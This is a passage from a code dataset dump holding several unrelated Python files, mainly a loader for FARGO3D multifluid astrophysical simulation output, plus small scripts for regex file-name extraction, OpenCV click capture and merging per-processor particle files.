","sub_path":"Problem1.py","file_name":"Problem1.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"180975450","text":"code_info = (\"fargo3d\", \"2.0\", \"multifluid\")\n\nimport os\nimport re\nimport copy\nimport numpy as np\nimport astropy.units as u\nimport astropy.constants as const\nfrom . import interface\nfrom .. import fluid\nfrom .. import field\nfrom .. import grid\nfrom .. import scalar\nfrom .. 
import particles\n\n\ndef identify(path):\n try:\n get_data_dir(path)\n return True\n except FileNotFoundError:\n return False\n\n\nvars_2d = {\n \"mass density\": {\n \"pattern\": \"{}dens{}.dat\",\n \"unitpowers\": {\n \"mass\": 1,\n \"length\": -2\n }\n },\n \"energy density\": {\n \"pattern\": \"{}energy{}.dat\",\n \"unitpowers\": {\n \"mass\": 1,\n \"time\": -2\n }\n },\n \"velocity radial\": {\n \"pattern\": \"{}vy{}.dat\",\n \"unitpowers\": {\n \"length\": 1,\n \"time\": -1\n },\n \"interfaces\": [\"r\"],\n },\n \"velocity azimuthal\": {\n \"pattern\": \"{}vx{}.dat\",\n \"unitpowers\": {\n \"length\": 1,\n \"time\": -1\n },\n \"interfaces\": [\"phi\"],\n },\n \"vpolar\": {\n \"pattern\": \"{}vz{}.dat\",\n \"unitpowers\": {\n \"length\": 1,\n \"time\": -1\n },\n \"interfaces\": [\"theta\"],\n },\n \"grainsize\": {\n \"pattern\": \"{}grainsize{}.dat\",\n \"unitpowers\": {\n \"length\": 1\n },\n },\n \"grainsize drift\": {\n \"pattern\": \"{}grainsize_drift{}.dat\",\n \"unitpowers\": {\n \"length\": 1\n },\n },\n \"grainsize frag\": {\n \"pattern\": \"{}grainsize_frag{}.dat\",\n \"unitpowers\": {\n \"length\": 1\n },\n },\n \"grainsize driftfrag\": {\n \"pattern\": \"{}grainsize_driftfrag{}.dat\",\n \"unitpowers\": {\n \"length\": 1\n },\n },\n \"grainsize coag\": {\n \"pattern\": \"{}grainsize_coag{}.dat\",\n \"unitpowers\": {\n \"length\": 1\n },\n }\n}\n\nvars_1d = {\n 'torque planet {}': {\n 'pattern': 'torq_1d_Y_raw_planet_{}.dat',\n 'for each planet': True,\n 'directions': [\"r\"],\n 'unitpowers': {\n \"mass\": 1,\n \"length\": 2,\n \"time\": -2\n }\n },\n 'velocity radial': {\n 'pattern': '{}vy{}.dat',\n 'directions': [\"r\"],\n 'unitpowers': {\n \"mass\": 0,\n \"length\": 1,\n \"time\": -1\n }\n },\n 'velocity azimuthal': {\n 'pattern': '{}vx{}.dat',\n 'directions': [\"r\"],\n 'unitpowers': {\n \"mass\": 0,\n \"length\": 1,\n \"time\": -1\n }\n },\n}\n\nvars_scalar = {\n 'mass': {\n 'file': 'mass.dat',\n 'datacol': 1,\n 'timecol': 0,\n 'unitpowers': {\n \"mass\": 1\n }\n },\n 'angular momentum': {\n 'file': 'momx.dat',\n 'datacol': 1,\n 'timecol': 0,\n 'unitpowers': {\n \"mass\": 1,\n \"length\": 2,\n \"time\": -1\n }\n },\n 'kinetic energy azimuthal': {\n 'file': 'ekinx.dat',\n 'datacol': 1,\n 'timecol': 0,\n 'unitpowers': {\n \"mass\": 1,\n \"length\": 2,\n \"time\": -2\n }\n },\n 'kinetic energy radial': {\n 'file': 'ekiny.dat',\n 'datacol': 1,\n 'timecol': 0,\n 'unitpowers': {\n \"mass\": 1,\n \"length\": 2,\n \"time\": -2\n }\n },\n 'kinetic energy vertical': {\n 'file': 'ekinz.dat',\n 'datacol': 1,\n 'timecol': 0,\n 'unitpowers': {\n \"mass\": 1,\n \"length\": 2,\n \"time\": -2\n }\n },\n 'torque planet {}': {\n 'file': 'torq_planet_{}.dat',\n 'for each planet': True,\n 'datacol': 1,\n 'timecol': 0,\n 'unitpowers': {\n \"mass\": 1,\n \"length\": 2,\n \"time\": -2\n }\n },\n}\n\nplanet_vars_scalar = {\n 'x': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 1,\n 'timecol': 8,\n 'unitpowers': {\n 'length': 1\n }\n },\n 'y': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 2,\n 'timecol': 8,\n 'unitpowers': {\n 'length': 1\n }\n },\n 'z': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 3,\n 'timecol': 8,\n 'unitpowers': {\n 'length': 1\n }\n },\n 'vx': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 4,\n 'timecol': 8,\n 'unitpowers': {\n 'length': 1,\n \"time\": -1\n }\n },\n 'vy': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 5,\n 'timecol': 8,\n 'unitpowers': {\n 'length': 1,\n \"time\": -1\n }\n },\n 'vz': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 6,\n 'timecol': 8,\n 'unitpowers': {\n 
'length': 1,\n \"time\": -1\n }\n },\n 'mass': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 7,\n 'timecol': 8,\n 'unitpowers': {\n 'mass': 1\n }\n },\n 'mass': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 9,\n 'timecol': 8,\n 'unitpowers': {\n 'time': -1\n }\n },\n 'time step': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 0,\n 'timecol': 8,\n 'unitpowers': {}\n },\n 'physical time': {\n 'file': 'bigplanet{}.dat',\n 'datacol': 8,\n 'timecol': 8,\n 'unitpowers': {\n \"time\": 1\n }\n },\n ########################################\n ### orbital elements\n 'physical time orbit': {\n 'file': 'orbit{}.dat',\n 'datacol': 0,\n 'timecol': 0,\n 'unitpowers': {\n \"time\": 1\n }\n },\n 'eccentricity': {\n 'file': 'orbit{}.dat',\n 'datacol': 1,\n 'timecol': 0,\n 'unitpowers': {}\n },\n 'semi-major axis': {\n 'file': 'orbit{}.dat',\n 'datacol': 2,\n 'timecol': 0,\n 'unitpowers': {\n \"length\": 1\n }\n },\n 'mean anomaly': {\n 'file': 'orbit{}.dat',\n 'datacol': 3,\n 'timecol': 0,\n 'unitpowers': {}\n },\n 'true anomaly': {\n 'file': 'orbit{}.dat',\n 'datacol': 4,\n 'timecol': 0,\n 'unitpowers': {}\n },\n 'argument of periapsis': {\n 'file': 'orbit{}.dat',\n 'datacol': 5,\n 'timecol': 0,\n 'unitpowers': {}\n },\n 'x-axis rotation angle': {\n 'file': 'orbit{}.dat',\n 'datacol': 6,\n 'timecol': 0,\n 'unitpowers': {}\n },\n 'inclination': {\n 'file': 'orbit{}.dat',\n 'datacol': 7,\n 'timecol': 0,\n 'unitpowers': {}\n },\n 'ascending node': {\n 'file': 'orbit{}.dat',\n 'datacol': 8,\n 'timecol': 0,\n 'unitpowers': {}\n },\n 'longitude of periapsis': {\n 'file': 'orbit{}.dat',\n 'datacol': 9,\n 'timecol': 0,\n 'unitpowers': {}\n },\n}\n\nalias_fields = {\n \"velocity radial\": \"vrad\",\n \"velocity azimuthal\": \"vazimuth\",\n \"total energy density\": \"energy density\"\n}\n\nalias_reduced = {\n \"output time step\": \"analysis time step\",\n \"simulation time\": \"physical time\",\n \"mass\": \"mass\",\n \"angular momentum\": \"angular momentum\",\n \"total energy\": \"total energy\",\n \"internal energy\": \"internal energy\",\n \"kinetic energy\": \"kinetic energy\",\n \"eccentricity\": \"eccentricity\",\n \"periastron\": \"periastron\",\n \"mass flow inner\": \"\",\n \"mass flow outer\": \"\",\n \"mass flow wavedamping\": \"\",\n \"mass flow densityfloor\": \"\"\n}\n\nalias_particle = {\n \"output time step\": \"time step\",\n \"simulation time\": \"physical time\",\n \"argument of periapsis\": \"argument of periapsis\",\n \"velocity\": \"velocity\",\n \"mass\": \"mass\",\n \"angular momentum\": \"angular momentum\",\n \"eccentricity\": \"eccentricity\",\n \"semi-major axis\": \"semi-major axis\"\n}\n\n\ndef var_in_files(varpattern, files):\n p = re.compile(varpattern.replace(\".\", \"\\.\").format(\"\\d+\"))\n for f in files:\n if re.match(p, f):\n return True\n return False\n\n\ndef load_scalar(file, var):\n return [1, 1]\n\n\ndef get_data_dir(path):\n rv = None\n ptrn = re.compile(\"summary\\d+.dat\")\n for root, dirs, files in os.walk(path):\n for f in files:\n m = re.search(ptrn, f)\n if m:\n rv = root\n break\n if rv is None:\n raise FileNotFoundError(\n \"Could not find identifier file 'summary\\d+.dat' in any subfolder of '{}'\"\n .format(path))\n return rv\n\n\ndef find_first_summary(dataDir):\n return \"summary{}.dat\".format(find_first_summary_number(dataDir))\n\n\ndef find_first_summary_number(dataDir):\n return find_summary_numbers(dataDir)[0]\n\n\ndef find_summary_numbers(dataDir):\n ptrn = re.compile(\"summary(\\d+).dat\")\n summaries = []\n for f in os.listdir(dataDir):\n m = 
re.search(ptrn, f)\n if m:\n n = int(m.groups()[0])\n summaries.append(n)\n summaries.sort()\n return summaries\n\n\ndef get_unit_from_powers(unitpowers, units):\n unit = 1.0\n for u, p in unitpowers.items():\n unit = unit * units[u]**p\n return unit\n\n\nclass Loader(interface.Interface):\n\n code_info = code_info\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.data_dir = get_data_dir(self.path)\n self.output_times = np.array([])\n self.fine_output_times = np.array([])\n\n def scout(self):\n self.get_domain_size()\n self.get_parameters()\n self.get_units()\n self.apply_units()\n self.load_times()\n self.get_planets()\n self.get_fluids()\n self.get_fields()\n self.get_scalars()\n self.get_nbodysystems()\n self.register_alias()\n\n def get_parameters(self):\n self.parameters = getParamsFromNthSummary(\n self.data_dir, find_first_summary_number(self.data_dir))\n\n def apply_units(self):\n for vardict in [planet_vars_scalar, vars_2d, vars_1d, vars_scalar]:\n for var, info in vardict.items():\n info[\"unit\"] = get_unit_from_powers(info[\"unitpowers\"],\n self.units)\n\n def register_alias(self):\n for particlegroup in self.particlegroups:\n particlegroup.alias.register_dict(alias_particle)\n for planet in self.planets:\n planet.alias.register_dict(alias_particle)\n for name, fluid in self.fluids.items():\n fluid.alias.register_dict(alias_fields)\n fluid.alias.register_dict(alias_reduced)\n\n def get_nbodysystems(self):\n pass\n\n def get_planets(self):\n planet_ids = []\n p = re.compile(\"bigplanet(\\d).dat\")\n for s in os.listdir(self.data_dir):\n m = re.match(p, s)\n if m:\n planet_ids.append(m.groups()[0])\n planet_ids.sort()\n # create planets\n self.planets = []\n for pid in planet_ids:\n self.planets.append(particles.Planet(str(pid), pid))\n # add variables to planets\n for pid, planet in zip(planet_ids, self.planets):\n for varname in planet_vars_scalar:\n info = planet_vars_scalar[varname]\n datafile = os.path.join(self.data_dir,\n info[\"file\"].format(pid))\n loader = ScalarLoader(varname, datafile, info, self)\n planet.register_variable(varname, loader)\n\n def get_fluids(self):\n ptrn = re.compile(\"output(.*)\\.dat\")\n fluid_names = [\n m.groups()[0]\n for m in (re.search(ptrn, f) for f in os.listdir(self.data_dir))\n if m is not None\n ]\n for name in fluid_names:\n self.fluids[name] = fluid.Fluid(name)\n\n def get_fields(self):\n self.get_fields_2d()\n self.get_fields_1d()\n\n def get_fields_2d(self):\n files = os.listdir(self.data_dir)\n for fluidname in self.fluids.keys():\n for varname, info in vars_2d.items():\n info_formatted = copy.deepcopy(info)\n info_formatted[\"pattern\"] = info_formatted[\"pattern\"].format(\n fluidname, \"{}\")\n if var_in_files(info_formatted[\"pattern\"], files):\n fieldLoader = FieldLoader2d(varname, info_formatted, self)\n self.fluids[fluidname].register_variable(\n varname, \"2d\", fieldLoader)\n\n def get_fields_1d(self):\n for fluid_name in self.fluids:\n fl = self.fluids[fluid_name]\n monitor_dir = os.path.join(self.data_dir, \"monitor\", fluid_name)\n monitor_files = os.listdir(monitor_dir)\n for name_pattern, info in vars_1d.items():\n for n in range(len(self.planets)):\n try:\n filename = info[\"pattern\"].format(n)\n except IndexError:\n filename = info[\"pattern\"].format(fluid_name, n)\n\n datafile = os.path.join(monitor_dir, filename)\n if not os.path.exists(datafile):\n datafile = os.path.join(self.data_dir, filename)\n varname = name_pattern.format(n)\n if os.path.exists(datafile):\n 
info_formatted = copy.deepcopy(info)\n info_formatted[\"pattern\"] = info_formatted[\n \"pattern\"].format(fluid_name, \"{}\")\n info_formatted[\"datafile\"] = datafile\n fieldLoader = FieldLoader1d(varname, info_formatted,\n self)\n fl.register_variable(varname, \"1d\", fieldLoader)\n if not \"for each planet\" in info or not info[\n \"for each planet\"]:\n break\n\n def get_scalars(self):\n for fluid_name in self.fluids:\n fl = self.fluids[fluid_name]\n monitor_dir = os.path.join(self.data_dir, \"monitor\", fluid_name)\n monitor_files = os.listdir(monitor_dir)\n for name_pattern, info in vars_scalar.items():\n for n in range(len(self.planets)):\n datafile = os.path.join(monitor_dir,\n info[\"file\"].format(n))\n varname = name_pattern.format(n)\n if os.path.exists(datafile):\n fl.register_variable(\n varname, \"scalar\",\n ScalarLoader(varname, datafile, info, self))\n if not \"for each planet\" in info or not info[\n \"for each planet\"]:\n break\n\n def get_domain_size(self):\n self.Nphi, self.Nr = loadNcells(self.data_dir)\n\n def load_times(self):\n self.output_times = loadCoarseOutputTimes(self.data_dir,\n self.units[\"time\"])\n self.fine_output_times = loadFineOutputTimes(self.data_dir,\n self.units[\"time\"])\n\n def get_output_time(self, n):\n return self.output_times[n]\n\n def get_fine_output_time(self, n):\n rv = self.fine_output_times[n]\n return rv\n\n def get_units(self):\n self.units = loadUnits(self.data_dir)\n\n\nclass FieldLoader2d(interface.FieldLoader):\n def load_time(self, n, *args, **kwargs):\n if n is None:\n rv = self.loader.output_times\n else:\n if \"stride\" in kwargs.keys():\n n /= kwargs[\"stride\"]\n n = int(n)\n rv = self.loader.get_output_time(n)\n return rv\n\n def load_data(self, n):\n unit = self.info[\"unit\"]\n Nr = self.loader.Nr #+ (1 if \"interfaces\" in self.info and \"r\" in self.info[\"interfaces\"] else 0)\n Nphi = self.loader.Nphi #+ (1 if \"interfaces\" in self.info and \"phi\" in self.info[\"interfaces\"] else 0)\n rv = np.fromfile(self.loader.data_dir +\n \"/\" + self.info[\"pattern\"].format(n)).reshape(\n Nr, Nphi) * unit\n return rv\n\n def load_grid(self, n):\n r_i = np.genfromtxt(self.loader.data_dir + \"/domain_y.dat\"\n )[3:-3] * self.loader.units[\"length\"]\n # account for Fargo3d not writing out last radial interface\n if \"interfaces\" in self.info and \"r\" in self.info[\"interfaces\"]:\n r_i = r_i[:-1]\n phi_i = np.genfromtxt(self.loader.data_dir +\n \"/domain_x.dat\") * u.Unit(\"rad\")\n active_interfaces = self.info[\n \"interfaces\"] if \"interfaces\" in self.info else []\n g = grid.PolarGrid(r_i=r_i,\n phi_i=phi_i,\n active_interfaces=active_interfaces)\n return g\n\n\nclass FieldLoader1d(interface.FieldLoader):\n def load_time(self, n):\n if n is None:\n rv = self.loader.fine_output_times\n else:\n rv = self.loader.get_fine_output_time(n)\n return rv\n\n def load_data(self, n):\n unit = self.info[\"unit\"]\n Nr = self.loader.Nr #+ (1 if \"interfaces\" in self.info and \"r\" in self.info[\"interfaces\"] else 0)\n Nphi = self.loader.Nphi #+ (1 if \"interfaces\" in self.info and \"phi\" in self.info[\"interfaces\"] else 0)\n if self.info[\"directions\"] == [\"r\"]:\n N = Nr\n elif self.info[\"directions\"] == [\"phi\"]:\n N = Nphi\n else:\n raise ValueError(\n \"Trying to construct 1d field but direction is not given. 
Info = '{}'\"\n .format(self.info))\n datafile = self.info[\"datafile\"]\n rv = np.fromfile(datafile, count=N, offset=n * N * 8) * unit\n return rv\n\n def load_grid(self, n):\n r_i = np.genfromtxt(self.loader.data_dir + \"/domain_y.dat\"\n )[3:-3] * self.loader.units[\"length\"]\n # account for Fargo3d not writing out last radial interface\n if \"interfaces\" in self.info and \"r\" in self.info[\"interfaces\"]:\n r_i = r_i[:-1]\n phi_i = np.genfromtxt(self.loader.data_dir +\n \"/domain_x.dat\") * u.Unit(\"rad\")\n active_interfaces = self.info[\n \"interfaces\"] if \"interfaces\" in self.info else []\n kwargs = {}\n for d in [\"r\", \"phi\"]:\n if d in self.info[\"directions\"]:\n kwargs[d + \"_i\"] = locals()[d + \"_i\"]\n kwargs[\"active_interfaces\"] = active_interfaces\n g = grid.PolarGrid(**kwargs)\n return g\n\n\nclass ScalarLoader:\n def __init__(self, name, datafile, info, loader, *args, **kwargs):\n self.loader = loader\n self.datafile = datafile\n self.info = info\n self.name = name\n self.units = loader.units\n\n def __call__(self):\n time = self.load_time()\n data = self.load_data()\n f = scalar.Scalar(time, data, name=self.name)\n return f\n\n def load_data(self):\n col = self.info[\"datacol\"]\n unit = self.info[\"unit\"]\n rv = np.genfromtxt(self.datafile, usecols=int(col)) * unit\n return rv\n\n def load_time(self):\n col = self.info[\"timecol\"]\n unit = self.units[\"time\"]\n rv = np.genfromtxt(self.datafile, usecols=int(col)) * unit\n return rv\n\n\ndef loadCoarseOutputTimes(dataDir, unit):\n # search all summary.dat files for the time\n outputTimes = []\n pattern = re.compile('OUTPUT [0-9]* at simulation time ([0-9\\.eE+-]*)')\n for f in sorted([f for f in os.listdir(dataDir) if 'summary' in f],\n key=lambda x: int(x[7:-4])):\n with open(os.path.join(dataDir, f), 'r') as infile:\n datastr = infile.read()\n matches = re.findall(pattern, datastr)\n try:\n outputTimes.append(float(matches[0]))\n except ValueError:\n break\n times = np.array(outputTimes)\n # fall back to reading the planet file for multifluid version\n # which is missing the summary files\n #times = np.genfromtxt( os.path.join(dataDir, 'planet0.dat'))[:,8]\n #times = times*unit\n # correct for double entries in the planet file\n return times * unit\n\n\ndef loadFineOutputTimes(dataDir, unit):\n numbers = find_summary_numbers(dataDir)\n times = np.array([])\n for n in numbers:\n params = getParamsFromNthSummary(dataDir, n)\n dt = params[\"dt\"]\n Ninterm = params[\"ninterm\"]\n offset = 0 if len(times) == 0 else times[-1]\n new_times = np.arange(1, Ninterm + 1) * dt + offset\n times = np.append(times, new_times)\n times = times * unit\n return times\n\n\ndef getParamFromSummary(dataDir, param):\n return getParamsFromNthSummary(\n dataDir, find_first_summary_number(dataDir))[param.lower()]\n\n\ndef getParamsFromNthSummary(dataDir, n):\n # parse the Nth summary file to get all\n search_active = False\n parameters = {}\n with open(os.path.join(dataDir, \"summary{}.dat\".format(n))) as f:\n for line in f:\n line = line.strip()\n if not search_active:\n # look for the parameter section identifier\n if line == \"PARAMETERS SECTION:\":\n search_active = True\n continue\n if line == \"\" or line[0] in [\"#\", \"=\"]:\n continue\n if line.startswith(\"*** Input file: \"):\n parameters[\"config path\"] = line.split(\":\")[-1].strip()\n break\n parts = [s.strip() for s in line.split()]\n try:\n val = int(parts[1])\n except ValueError:\n try:\n val = float(parts[1])\n except ValueError:\n val = parts[1]\n 
parameters[parts[0].lower()] = val\n    return parameters\n\n\ndef loadRadius(dataDir, unit, interface=False):\n    r = np.genfromtxt(os.path.join(dataDir, 'domain_y.dat')) * unit\n    r = r[3:-3] #remove ghost cells\n    dr = r[1:] - r[:-1]\n    if not interface:\n        r = 0.5 * (r[1:] + r[:-1])\n    return (r, dr)\n\n\ndef loadPhi(dataDir, interface=False):\n    #phiMin, phiMax, Nphi = np.genfromtxt(os.path.join(dataDir, 'dimensions.dat'), usecols=(0,1,6))\n    #phi = np.linspace(phiMin, phiMax, Nphi)\n    phi = np.genfromtxt(os.path.join(dataDir, 'domain_x.dat'))\n    if not interface:\n        phi = 0.5 * (phi[1:] + phi[:-1])\n    return phi\n\n\ndef loadMeshGrid(dataDir, unit):\n    # return a meshgrid for the disk to plot data\n    R, Phi = loadMeshGridPolar(dataDir, unit)\n    X = R * np.cos(Phi)\n    Y = R * np.sin(Phi)\n    return (X, Y)\n\n\ndef loadMeshGridPolar(dataDir, unit):\n    phi = loadPhi(dataDir)\n    r, dr = loadRadius(dataDir, unit)\n    Phi, R = np.meshgrid(phi, r)\n    return (R, Phi)\n\n\ndef loadUnits(dataDir):\n    ### load data units\n    first_summary = os.path.join(dataDir, find_first_summary(dataDir))\n    if os.path.exists(first_summary):\n        ptrn = \"COMPILATION OPTION SECTION:\\n==============================\\n.*\\-DCGS.*\\nGhost\"\n        with open(first_summary, 'r') as infile:\n            if re.search(ptrn, infile.read()):\n                # have cgs units\n                units = {\n                    \"mass\": u.g,\n                    \"time\": u.s,\n                    \"length\": u.cm,\n                    \"temperature\": u.K\n                }\n                return units\n\n    # Try to extract unit normalisation from summary\n    units = {}\n    units[\"mass\"] = 1.0\n    units[\"time\"] = 1.0\n    units[\"length\"] = 1.0\n\n    with open(first_summary, 'r') as infile:\n        ptrn = \"(?<=R0 = \\()\\d+.\\d+\"\n        m = re.search(ptrn, infile.read())\n        if m:\n            units[\"length\"] *= float(m.group())\n\n    with open(first_summary, 'r') as infile:\n        ptrn = \"(?<=MSTAR = \\()\\d+.\\d+\"\n        m = re.search(ptrn, infile.read())\n        if m:\n            units[\"mass\"] *= float(m.group())\n\n    with open(first_summary, 'r') as infile:\n        ptrn = r\"STEFANK =.*\\*pow\\(\\(\\d+\\.\\d+\\)\\/\\((\\d+\\.*\\d*\\*\\d+\\.\\d*\\w+\\d*)\\),-0\\.5\"\n        m = re.search(ptrn, infile.read())\n        if m:\n            components = m.group(1).split('*')\n            units[\"length\"] *= float(components[0]) * float(\n                components[1]) * u.cm\n\n    with open(first_summary, 'r') as infile:\n        ptrn = r\"STEFANK =.*\\*pow\\(\\(\\d+\\.\\d*\\)\\/(\\d+\\.\\d*\\w+\\d*),-1\\.5\\)\\*\"\n        m = re.search(ptrn, infile.read())\n        if m:\n            components = m.group(1).split('*')\n            units[\"mass\"] *= float(m.group(1)) * u.g\n    units[\"time\"] = (np.sqrt(units[\"length\"]**3 /\n                             (const.G.cgs * units[\"mass\"]))).to(u.s)\n\n    return units\n    # now try units file\n    # try:\n    # units = {l[0] : float(l[1])*u.Unit(l[2]) for l in\n    # [l.split() for l in open(os.path.join(dataDir,'units.dat'),'r')\n    # if l.split()[0] != '#' and len(l.split())==3]}\n    # ### fix temperature unit\n    # units['temperature'] = 1*u.K\n    # except FileNotFoundError:\n    # Fall back to default units\n    # units = { 'mass' : u.solMass, 'time' : 5.2**1.5*u.yr/(2*np.pi), 'length' : 5.2*u.au }\n    # Fall back to dimensionless units\n    #units = { bu : 1 for bu in ['mass', 'time', 'length'] }\n\n\ndef loadNcells(dataDir):\n    # Nphi, Nr = np.genfromtxt(os.path.join(dataDir, 'dimensions.dat'), usecols=(6,7), dtype=int)\n    Nphi = int(getParamFromSummary(dataDir, \"Nx\"))\n    Nr = int(getParamFromSummary(dataDir, \"Ny\"))\n    return (Nphi, Nr)\n\n\ndef load1dRadialMonitorRaw(n, dataFile, Ncells, unit):\n    # load data by first seeking the right position\n    # and then reading Nrad floats\n    f = open(dataFile, \"rb\") # reopen the file\n    f.seek(n * Ncells * 8, 
os.SEEK_SET) # seek\n    v = np.fromfile(f, dtype=np.float64, count=Ncells)\n    f.close()\n    v = v * unit\n    return v\n\n\ndef load1dRadialMonitorDensity(n, dataFile, r, dr, unit):\n    # Fargo3d outputs monitor variables as the integral over Phi\n    # Correct this by computing the density\n    rv = load1dRadialMonitorRaw(n, dataFile, len(r), unit)\n    rv = rv / np.pi / ((r + dr / 2)**2 - (r - dr / 2)**2)\n    return rv\n\n\ndef load1dRadialDensityAveragedFrom2d(n, dataFilePattern, Nr, Nphi, r, dr,\n                                      unit):\n    rv = load1dRadialAveragedFrom2d(n, dataFilePattern, Nr, Nphi, unit)\n    # make it a 2d density\n    rv = rv / np.pi / ((r + dr / 2)**2 - (r - dr / 2)**2)\n    return rv\n\n\ndef load1dRadialAveragedFrom2d(n, dataFilePattern, Nr, Nphi, unit):\n    # Load 2d data and average over the azimuthal domain\n    data = load2d(n, dataFilePattern, Nr, Nphi, unit)\n    rv = np.mean(data, axis=1)\n    return rv\n\n\ndef load2d(n, dataFilePattern, Nr, Nphi, unit):\n    # Load 2d data and reshape it\n    rv = np.fromfile(dataFilePattern.format(n)).reshape(Nr, Nphi) * unit\n    return rv\n","sub_path":"src/simdata/loaders/fargo3dmultifluid.py","file_name":"fargo3dmultifluid.py","file_ext":"py","file_size_in_byte":27127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"505301133","text":"import re\n\n\np = re.compile('\\[File[^\\|]+')\np2 = re.compile('\\[ファイル[^\\|]+')\nline = open(\"igirisu.txt\").read()\nm = re.findall(p,line)\nfor i in m:\n    i = i[len(\"[File:\"):]\n    print(i)\nm = re.findall(p2,line)\nfor i in m:\n    i = i[len(\"[ファイル:\"):]\n    print(i)","sub_path":"ando/chapter03/knock24.py","file_name":"knock24.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"361549475","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Aug 27 09:54:04 2020\r\n\r\n@author: xixiu\r\n\"\"\"\r\n\r\nimport cv2 as cv\r\nimport matplotlib.pyplot as plt\r\n\r\ndef get_pyrolysis_front(img):\r\n    img = cv.imread(img)\r\n    \r\n    img = img[400:800, :, :]\r\n    # img = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\r\n    # (T, img) = cv.threshold(img, 10, 255, cv.THRESH_BINARY)\r\n    \r\n    a = []\r\n    \r\n    def on_EVENT_LBUTTONDOWN(event, x, y, flags, param):\r\n        if event == cv.EVENT_LBUTTONDOWN:\r\n            xy = \"%d,%d\" % (x, y)\r\n            a.append(x)\r\n            cv.circle(img, (x, y), 1, (0, 0, 255), thickness=-1)\r\n            cv.putText(img, xy, (x, y), cv.FONT_HERSHEY_PLAIN,\r\n                       1.0, (0, 0, 255), thickness=1)\r\n            cv.imshow(\"image\", img)\r\n            cv.destroyAllWindows()\r\n    \r\n    cv.namedWindow(\"image\")\r\n    cv.setMouseCallback(\"image\", on_EVENT_LBUTTONDOWN)\r\n    cv.imshow(\"image\", img)\r\n    cv.waitKey(0)\r\n    return a\r\n\r\na = get_pyrolysis_front('0321-S4C3.jpg')","sub_path":"FlameMeasuresforSIBAL/find_informations_of_images.py","file_name":"find_informations_of_images.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"165539771","text":"from __future__ import division;\nimport numpy as np;\nimport os;\n\n#-------#\n# Input #\n#-------#\nrunName = \"../cristobaliteTest\";\nfirst = 0;\nlast = 800;\n\n#-----------#\n# Functions #\n#-----------#\n\n#reading file into 2D list of strings\ndef readDatafile(filename, separator):\n\tinfile = open(filename, \"r\");\n\tout = [];\n\tfor line in infile:\n\t\tout.append(line.split(separator));\n\t#end\n\tinfile.close();\n\treturn out;\n#end\n\n#------#\n# Main #\n#------#\n#Read rcut, size and processors from data file\ndatafilename 
= runName + \"/init/data.dat\";\ndata = readDatafile(datafilename, \" \");\npx = int(data[0][0]);\npy = int(data[0][1]);\npz = int(data[0][2]);\nsx = float(data[1][0]);\nsy = float(data[1][1]);\nsz = float(data[1][2]);\nrcut = float(data[2][0]);\n#Calculate Lx, Ly, Lz for each processor\nprocs = px*py*pz;\ns = np.array([sx, sy, sz]);\np = np.array([px, py, pz]);\n#Number of cells\nc = np.floor(s/rcut);\n#Size of cells\nb = s/c;\n#Number of cells in each processor\nn = c//p;\n#Number of processors with one extra cell\nm = c%p;\n#Size of processors\nL = n*b;\n#Processor extra cell boundary\nB = m*(L + b);\n\n#Coordinates of processors\nR = np.zeros([procs, 3]);\nfor rank in range(0, procs):\n\t#Finding x, y, z latice positions of processes\n\ti = rank%px;\n\tj = (rank//px)%py;\n\tk = rank//(px*py);\n\tlr = np.array([i, j, k]);\n\tfor d in range(0, 3):\n\t\tif(lr[d] > m[d]):\n\t\t\tR[rank, d] = B[d] + (lr[d] - m[d])*L[d];\n\t\telse:\n\t\t\tR[rank, d] = lr[d]*(L[d] + b[d]);\n\t\t#end\n\t#end\n#end\n\nfor i in range(first, last + 1):\n\tdirname = runName + (\"/%05d\"%i);\n\t#Make sure directory exists\n\tif(not os.path.exists(dirname)):\n\t\tcontinue;\n\t#end\n\t#Finding number of particles\n\tN = 0;\n\tfor rank in range(0, procs):\n\t\tfilename = dirname + (\"/%03d.xyz\"%rank);\n\t\tpfile = open(filename, \"r\");\n\t\tN += int(float(pfile.readline()));\n\t\tpfile.close();\n\t#end\n\tcombinedFilename = dirname + \"/combined.xyz\";\n\tcombinedFile = open(combinedFilename, \"w\");\n\tcombinedFile.write(str(N) + \"\\n\\n\");\n\tfor rank in range(0, procs):\n\t\tfilename = dirname + (\"/%03d.xyz\"%rank);\n\t\tpfile = open(filename, \"r\");\n\t\t#Toss away comment and number of particles\n\t\tpfile.readline(); pfile.readline();\n\t\tfor line in pfile:\n\t\t\tlinesplit = line.split(\" \");\n\t\t\tt = linesplit[0];\n\t\t\tr = linesplit[1:4];\n\t\t\trest = linesplit[4:];\n\t\t\t#Convert from local to global coordinates\n\t\t\tfor d in range(0, 3):\n\t\t\t\tr[d] = str(float(r[d]) + R[rank, d]);\n\t\t\t#end\n\t\t\tcombinedFile.write(\" \".join([t, \" \".join(r), \" \".join(rest)]));\n\t\t#end\n\t\tpfile.close();\n\t#end\n\tcombinedFile.close();\n#end\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"clayff/pythonScripts/combineProcs.py","file_name":"combineProcs.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"255903892","text":"import logging\nimport datetime\nimport sys\n#import tensorflow as tf\n\ndef setup_logger(name):\n now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')\n formatter = logging.Formatter(fmt='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n handler = logging.FileHandler('log/{}.log'.format(now), mode='w')\n 